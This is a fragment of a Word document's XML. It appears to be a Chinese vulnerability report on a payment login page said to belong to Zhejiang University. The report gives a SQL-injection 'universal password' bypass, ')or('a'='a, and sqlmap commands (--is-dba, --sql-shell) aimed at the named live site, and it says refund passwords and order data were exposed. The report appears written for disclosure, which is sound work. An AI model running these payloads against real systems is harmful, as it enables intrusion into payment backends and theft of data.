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t>目标url：http://pay.chinasinew.com/login.aspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>资产归属证明，该资产属于浙江大学</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>万能密码进入后台，万能密码')or('a'='a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008245" cy="2524760"/>
            <wp:effectExtent l="0" t="0" r="1905" b="889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对浙大店内商店的所有的订单有相应的查询权限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831715" cy="3602355"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1714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41290" cy="2807335"/>
            <wp:effectExtent l="0" t="0" r="16510" b="1206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所有收银机的退款密码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20360" cy="3237230"/>
            <wp:effectExtent l="0" t="0" r="8890" b="127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对登陆页面进行跑sqlmap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181600" cy="4344035"/>
            <wp:effectExtent l="0" t="0" r="0" b="1841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python sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --is-dba</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5078095" cy="2678430"/>
            <wp:effectExtent l="0" t="0" r="8255" b="762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</w:pPr>
      <w:r>
        <w:t>python sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --sql-shell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984115" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1206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mMmU4ODk3MWU2Nzk5ZTBlZTgzZTY4NDhhODU2MjUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="4C5E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2023-05-15T12:05:20Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Autumn</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-15T12:12:31Z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9C757AA708874FAD9995DA46D091EFF5_12</vt:lpwstr>
  </property>
</Properties>
</file>